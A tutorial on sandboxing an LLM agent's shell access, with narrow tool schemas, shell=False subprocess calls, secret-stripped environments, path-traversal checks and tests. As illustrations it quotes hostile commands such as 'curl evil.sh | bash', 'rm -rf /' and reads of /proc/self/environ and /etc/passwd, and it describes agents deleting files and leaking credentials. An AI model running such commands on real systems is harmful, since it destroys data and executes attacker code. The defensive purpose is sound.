Problem: Your Agent Runs Shell Commands It Shouldn't
You've wired up an LLM to a Linux terminal. It works in demos. Then in production it deletes a directory, hangs on sudo, or leaks credentials through a subshell. Teaching agents to use the terminal safely is different from teaching them to use it at all.
You'll learn:
- How to structure tool definitions that constrain dangerous behavior
- How to sandbox subprocess execution so damage is contained
- How to validate and sanitize commands before they run
Time: 25 min | Level: Advanced
Why This Happens
LLMs are trained on human shell sessions — including the bad ones. When you give an agent unrestricted bash access, it inherits every habit from that training data: piping to sudo, using rm -rf, writing credentials to disk, and running find / with no timeout.
The model isn't being malicious. It's pattern-matching to what "a developer solving this problem" looks like in its training corpus. Your job is to make the safe path the obvious path.
Common failure modes:
- Agent runs sudo apt install and hangs waiting for a password prompt it can't see
- A chained command like cd /tmp && curl evil.sh | bash slips through naive allowlists
- The agent reads /proc/self/environ and inadvertently logs secrets
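The allowlist failure is worth seeing concretely. Here is a minimal sketch of a naive prefix-based allowlist (the ALLOWED_PREFIXES set and is_allowed helper are hypothetical, for illustration only) and why a chained command rides straight through it:

```python
# Hypothetical naive allowlist: approve a command string if it
# starts with a "safe" binary name
ALLOWED_PREFIXES = ("ls", "cat", "cd", "echo")

def is_allowed(command: str) -> bool:
    return command.strip().startswith(ALLOWED_PREFIXES)

# The prefix check sees only "cd" and approves the whole chain —
# the curl | bash rides along untouched
print(is_allowed("cd /tmp && curl evil.sh | bash"))  # True
print(is_allowed("rm -rf /"))                        # False
```

String-level checks can't see shell structure; that's why the steps below constrain the tools and the execution layer instead.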
Solution
Step 1: Define Narrow Tools, Not a General Bash Tool
The biggest mistake is giving agents a single run_bash(command: str) tool. Replace it with purpose-built tools that limit the blast radius.
# ❌ Too broad — model can run anything
tools = [{"name": "run_bash", "input_schema": {"command": {"type": "string"}}}]
# ✅ Narrow tools with constrained inputs
tools = [
{
"name": "list_directory",
"description": "List files in a directory. Never traverses outside the project root.",
"input_schema": {
"type": "object",
"properties": {
"path": {
"type": "string",
"description": "Relative path from project root"
}
},
"required": ["path"]
}
},
{
"name": "read_file",
"description": "Read a file's contents. Refuses paths with '..' or absolute paths.",
"input_schema": {
"type": "object",
"properties": {
"path": {"type": "string"}
},
"required": ["path"]
}
},
{
"name": "run_test",
"description": "Run the project test suite. No arguments accepted.",
"input_schema": {"type": "object", "properties": {}}
}
]
Why this works: The model can only call what you define. It can't improvise a curl | bash if curl isn't a tool.
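On the application side, one way to enforce this is a strict dispatch table: only registered handlers run, and unknown tool names get a structured refusal rather than any shell fallback. A sketch, with hypothetical stub handlers standing in for real implementations:

```python
# Hypothetical stub handlers for the three tools defined above
def list_directory(path: str) -> dict:
    return {"entries": []}  # stub

def read_file(path: str) -> dict:
    return {"content": ""}  # stub

def run_test() -> dict:
    return {"status": "ok"}  # stub

TOOL_HANDLERS = {
    "list_directory": list_directory,
    "read_file": read_file,
    "run_test": run_test,
}

def dispatch(tool_name: str, tool_input: dict) -> dict:
    # Unknown tool names get a structured error, never a shell fallback
    handler = TOOL_HANDLERS.get(tool_name)
    if handler is None:
        return {"error": f"Unknown tool: {tool_name}"}
    return handler(**tool_input)
```

A request for a tool you never defined, such as dispatch("run_bash", {"command": "rm -rf /"}), returns an error dict instead of executing anything.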
If it fails:
- Model complains it can't do the task: Your tool set is too narrow. Add a specific tool for that use case rather than widening an existing one.
Step 2: Sandbox Every Subprocess
Even with narrow tools, the implementations need guardrails. Use subprocess with hard limits instead of shell=True.
import subprocess
import shutil
import os
from pathlib import Path
PROJECT_ROOT = Path("/workspace/project").resolve()
def safe_run(cmd: list[str], timeout: int = 10) -> dict:
"""
Run a command with no shell interpolation, bounded runtime,
and output capped to prevent memory exhaustion.
"""
# Resolve the binary path — rejects shell builtins and aliases
binary = shutil.which(cmd[0])
if binary is None:
return {"error": f"Command not found: {cmd[0]}"}
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=timeout, # Kills hanging processes
cwd=PROJECT_ROOT, # Working dir is always project root
env=sanitized_env(), # Strip secrets from environment
shell=False # Never use shell=True
)
return {
"stdout": result.stdout[:10_000], # Cap output at 10KB
"stderr": result.stderr[:2_000],
"exit_code": result.returncode
}
def sanitized_env() -> dict:
"""Return a minimal env — remove tokens, keys, and passwords."""
safe_keys = {"PATH", "HOME", "LANG", "TERM", "USER"}
return {k: v for k, v in os.environ.items() if k in safe_keys}
Why shell=False matters: With shell=True, a command like ls; rm -rf / runs both parts. With shell=False and a list, the arguments are passed directly to execve — no interpolation, no chaining, no shell operators.
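The difference is easy to verify directly with subprocess, using echo as a harmless stand-in for a dangerous chain:

```python
import subprocess

# shell=True: /bin/sh parses the string, so ';' separates two commands
chained = subprocess.run("echo one; echo two", shell=True,
                         capture_output=True, text=True)
print(chained.stdout)  # "one\ntwo\n" — both commands ran

# shell=False with a list: "one; echo two" is a single literal argument
literal = subprocess.run(["echo", "one; echo two"],
                         capture_output=True, text=True)
print(literal.stdout)  # "one; echo two\n" — no second command
```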
Step 3: Validate Paths Before Any File Operation
Path traversal is the most common way agents escape their sandbox. Validate before you act.
def resolve_safe_path(user_path: str, root: Path) -> Path:
"""
Resolve a user-supplied path against a root.
Raises ValueError if it would escape the root.
"""
# Reject absolute paths immediately
if os.path.isabs(user_path):
raise ValueError(f"Absolute paths not allowed: {user_path}")
resolved = (root / user_path).resolve()
# resolved must still be inside root
try:
resolved.relative_to(root)
except ValueError:
raise ValueError(f"Path traversal detected: {user_path}")
return resolved
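A quick sanity check of the behavior (the function is repeated here so the snippet runs standalone; the paths are illustrative):

```python
import os
from pathlib import Path

def resolve_safe_path(user_path: str, root: Path) -> Path:
    # Same logic as above: reject absolute paths, then confine to root
    if os.path.isabs(user_path):
        raise ValueError(f"Absolute paths not allowed: {user_path}")
    resolved = (root / user_path).resolve()
    try:
        resolved.relative_to(root)
    except ValueError:
        raise ValueError(f"Path traversal detected: {user_path}")
    return resolved

root = Path("/workspace/project")

# Inside the root: resolves normally
print(resolve_safe_path("src/main.py", root))

# Escaping the root: rejected before any filesystem access
try:
    resolve_safe_path("../../etc/passwd", root)
except ValueError as e:
    print(e)
```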
Plug this into every file tool before touching the filesystem:
def handle_read_file(path: str) -> dict:
try:
safe = resolve_safe_path(path, PROJECT_ROOT)
except ValueError as e:
return {"error": str(e)} # Return error to agent, don't raise
    # resolve_safe_path already followed symlinks — a link to /etc/passwd
    # would have failed the relative_to check. Still require a regular file.
    if not safe.is_file():
        return {"error": "File not found or not a regular file"}
return {"content": safe.read_text(errors="replace")[:50_000]}
If it fails:
- Agent reports it can't find legitimate files: Check that PROJECT_ROOT is resolved (call .resolve() on it at startup, not at call time).
- Symlinks legitimately needed: Use os.path.realpath() and verify the realpath is inside root.
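The symlink-friendly variant can be sketched like this (resolve_symlink_safe is a hypothetical name, not from the steps above): follow links fully, then require the real target to stay under the real root.

```python
import os
from pathlib import Path

def resolve_symlink_safe(user_path: str, root: Path) -> Path:
    """Variant for projects that legitimately use symlinks: follow
    links fully, then require the real target to stay under root."""
    if os.path.isabs(user_path):
        raise ValueError(f"Absolute paths not allowed: {user_path}")
    real = Path(os.path.realpath(root / user_path))
    real_root = Path(os.path.realpath(root))
    try:
        real.relative_to(real_root)
    except ValueError:
        raise ValueError(f"Symlink escapes project root: {user_path}")
    return real
```

A link pointing at another directory inside the project passes; a link pointing at /etc fails the relative_to check even though the link itself lives under root.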
Step 4: Return Structured Errors, Not Exceptions
When a tool fails, the agent needs enough information to recover — not a Python traceback it can't act on.
from dataclasses import dataclass
from typing import Literal
@dataclass
class ToolResult:
status: Literal["ok", "error", "timeout", "permission_denied"]
data: str
hint: str = "" # Actionable suggestion for the agent
def run_tests() -> ToolResult:
try:
result = safe_run(["pytest", "--tb=short", "-q"], timeout=60)
except subprocess.TimeoutExpired:
return ToolResult(
status="timeout",
data="",
hint="Tests exceeded 60s. Run a specific test file instead."
)
if result["exit_code"] != 0:
return ToolResult(
status="error",
data=result["stderr"],
hint="Check the failing test name and read that test file."
)
return ToolResult(status="ok", data=result["stdout"])
Why hints matter: An agent that gets {"error": "timeout"} will often retry the same command. An agent that gets {"hint": "Run a specific test file instead"} adapts.
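On the agent-loop side, the ToolResult can be serialized into the tool result content so the model sees status and hint together. A sketch, assuming a plain JSON payload (the shape is a design choice, not a Messages API requirement):

```python
import json
from dataclasses import dataclass, asdict
from typing import Literal

@dataclass
class ToolResult:
    status: Literal["ok", "error", "timeout", "permission_denied"]
    data: str
    hint: str = ""

def to_tool_content(result: ToolResult) -> str:
    # Drop empty fields (e.g., a blank hint) so the model isn't shown noise
    payload = {k: v for k, v in asdict(result).items() if v != ""}
    return json.dumps(payload)

print(to_tool_content(ToolResult(status="timeout", data="",
                                 hint="Run a specific test file instead.")))
```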
Verification
Run a quick adversarial test against your tool implementations before connecting them to a live agent:
import os
import pytest
def test_path_traversal_blocked():
with pytest.raises(ValueError, match="traversal"):
resolve_safe_path("../../etc/passwd", PROJECT_ROOT)
def test_absolute_path_blocked():
with pytest.raises(ValueError, match="Absolute"):
resolve_safe_path("/etc/hosts", PROJECT_ROOT)
def test_subprocess_no_shell_interpolation():
# If shell=False, semicolons are literal, not separators
result = safe_run(["echo", "hello; rm -rf /"])
assert result["stdout"].strip() == "hello; rm -rf /"
def test_env_stripped():
os.environ["SECRET_TOKEN"] = "do-not-leak"
env = sanitized_env()
assert "SECRET_TOKEN" not in env
You should see: All four tests pass with no security regressions.
What You Learned
- Narrow tools prevent entire classes of misuse — a model can't exploit a shell if there's no shell tool
- shell=False with a list eliminates command injection; shell=True invites it
- Path resolution must happen at call time against a pre-resolved root, or traversal bypasses the check
- Structured errors with hints let agents recover instead of retry-looping
Limitation: This approach works for agents you control. If you're running untrusted agent-generated code (not just commands), you need a full container sandbox — subprocess guardrails aren't sufficient.
When NOT to use this: If your agent genuinely needs interactive shell access (e.g., debugging a running process with gdb), narrow tools won't cut it. Use a proper PTY-based sandbox like daytona or a containerized execution environment instead.
Tested on Python 3.12, Ubuntu 24.04 LTS, and Claude (claude-sonnet-4-6) with tool use via the Messages API